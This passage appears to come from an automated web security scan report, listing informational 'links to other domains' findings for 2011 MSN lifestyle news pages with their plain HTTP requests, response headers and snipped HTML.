<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FMonk-charged-under-anti-smoking-law.aspx%3Fcp-documentid%3D27490985&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=monk+smoking+law&go=&form=msnpop"><strong>
...[SNIP]...
<div>Bhutan (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Bhutan&mkt=en-US&FORM=msnpop">see where that is</a>) is determined to be a smoke-free kingdom (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=monk+smoking+law+and+bad+karma&form=msnpop">here...s why</a>), and a Buddhist monk allegedly got in the way of that goal. He is accused of smuggling chewing tobacco. (Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=monk+smoking+law+and+five+years+in+prison&form=msnpop">the sentence</a>
...[SNIP]...
<div>Some people may have a predisposition for nicotine addiction. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=smoking+and+brain+defect&form=msnpop">Here...s why.</a>
...[SNIP]...
<div>Some celebs find it difficult to quit. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tobacco+and+Strasburg&form=msnpop">Here...s one battle</a>
...[SNIP]...
<div>Get some tips <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=smoking+and+quit+and+tips&form=msnpop">on how to quit</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.191. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx?cp-documentid=27489487

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Julie+Powers+Schenecker+admitted+to+killing+children&go=&form=msnpop
http://www.bing.com/search?q=Julie+Powers+Schenecker+released+from+hospital&go=&form=msnpop
http://www.bing.com/search?q=casey+anthony&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=julie+powers+schenecker%27s+husband+Army+officer+overseas&go=&form=msnpop
http://www.bing.com/search?q=julie+powers+schenecker+child+abuse+investigation+november&go=&form=msnpop
http://www.bing.com/search?q=julie+powers+schenecker+held+without+bail&go=&form=msnpop
http://www.bing.com/search?q=julie+powers+schenecker+traffic+accident+2010&go=&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FNo-bail-for-mom-who-killed-kids.aspx%3Fcp-documentid%3D27489487&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx?cp-documentid=27489487 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=4c3940d946eb46f6aedf17c993d6556b; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DDA67321A2A5496894A98726B441E8A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FNo-bail-for-mom-who-killed-kids.aspx%3Fcp-documentid%3D27489487&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+held+without+bail&go=&form=msnpop"><strong>
...[SNIP]...
<div>Julie Powers Schenecker, the Florida..woman who admitted to shooting and killing her children (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Julie+Powers+Schenecker+admitted+to+killing+children&go=&form=msnpop">find out why</a>), appeared in court a day after being <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Julie+Powers+Schenecker+released+from+hospital&go=&form=msnpop">released from the hospital</a>
...[SNIP]...
<div>Reportedly, Schenecker was recently under investigation for child abuse. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+child+abuse+investigation+november&go=&form=msnpop">Get</a>
...[SNIP]...
<div>Her husband is currently overseas. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker%27s+husband+Army+officer+overseas&go=&form=msnpop">Find out why.</a>
...[SNIP]...
<div>Schenecker had no criminal history except a bad traffic accident last year. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+traffic+accident+2010&go=&form=msnpop">Learn more about what happened</a>
...[SNIP]...
<div>Another mother made headlines in 2008 when she was charged with the murder of her 3-year-old daughter. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=casey+anthony&go=&form=msnpop">Who was it</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.192. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx?cp-documentid=27492355

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/recipe/search?domain=recipe&type=listing&q=super+bowl+appetizer+recipes&qpvt=super+bowl+appetizer+recipes&FORM=msnpop
http://www.bing.com/search?q=Authorities+and+Dispute+over+leadership+and+N+C+church&FORM=msnpop
http://www.bing.com/search?q=Greater+New+Zion+Baptist+Church+Fletcher%2C+NC&go=&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Police+break+up+fights+at+Greater+New+Zion+Baptist+Church&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=herschel+walker+mma+fight&go=&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=best+super+bowl+commercials+of+all+time&qpvt=best+super+bowl+commercials+of+all+time&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FPolice-break-up-fight-at-N.C.-church.aspx%3Fcp-documentid%3D27492355&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx?cp-documentid=27492355 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=cf96e8bba9074993a02703365fa015a4; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E7D8E1A1F82C4E96973F61255E01D840; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FPolice-break-up-fight-at-N.C.-church.aspx%3Fcp-documentid%3D27492355&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Police+break+up+fights+at+Greater+New+Zion+Baptist+Church&go=&form=msnpop"><strong>
...[SNIP]...
<div>About 30 police officers were called to break up a fight at a church west of Charlotte, NC. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Greater+New+Zion+Baptist+Church+Fletcher%2C+NC&go=&form=msnpop">Find out where</a>.) No serious injuries were reported. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Authorities+and+Dispute+over+leadership+and+N+C+church&FORM=msnpop">Find out the cause</a>
...[SNIP]...
<div>Recently, a former NFL running back fought his second MMA fight. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=herschel+walker+mma+fight&go=&form=msnpop">Who was it?</a>
...[SNIP]...
<div>Sunday is Super Bowl Sunday. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=best+super+bowl+commercials+of+all+time&qpvt=best+super+bowl+commercials+of+all+time&FORM=msnpop">See videos</a>
...[SNIP]...
<div>Find some great <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/recipe/search?domain=recipe&type=listing&q=super+bowl+appetizer+recipes&qpvt=super+bowl+appetizer+recipes&FORM=msnpop">game day recipes</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.193. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx?cp-documentid=27493050

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=sled+dogs&FORM=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?q=Whistler%2c+B.C.&mkt=en-US&FORM=msnpop
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=100+sled+dogs+slaughtered&go=&form=msnpop
http://www.bing.com/search?q=AKC+and+three+new+dog+breeds&go=&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=People+pills+top+list+of+animal+toxins&form=msnpop
http://www.bing.com/search?q=Providence+Animal+Shelter+and+donations&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=2010+Olympic+games&go=&form=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661289&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FSled-dogs-slaughtered.aspx%3Fcp-documentid%3D27493050&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Sled-dogs-slaughtered.aspx?cp-documentid=27493050 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9d0e239e7ac2433783b6e1984e2a640d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F2948FA90D7341EBAEBC10D9E454F035; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661289&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FSled-dogs-slaughtered.aspx%3Fcp-documentid%3D27493050&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=100+sled+dogs+slaughtered&go=&form=msnpop"><strong>
...[SNIP]...
<div>A dog handler in Whistler, B.C. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Whistler%2c+B.C.&mkt=en-US&FORM=msnpop">see where</a>), is reportedly under investigation in the deaths of about 100 sled dogs. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=sled+dogs&FORM=msnpop">See dog photos</a>.) Authorities say the deaths might be linked to the decline in tourism after the Olympics. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=2010+Olympic+games&go=&form=msnpop">Watch</a>
...[SNIP]...
<div>The animals at one shelter are cozier and better fed. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Providence+Animal+Shelter+and+donations&go=&form=msnpop">Here...s why.</a>
...[SNIP]...
<div>Watch your medications around animals. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=People+pills+top+list+of+animal+toxins&form=msnpop">Find out more</a>
...[SNIP]...
<div>The American Kennel Club has declared three new dog breeds. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=AKC+and+three+new+dog+breeds&go=&form=msnpop">Here...s what they are.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.194. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx?cp-documentid=27492385

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
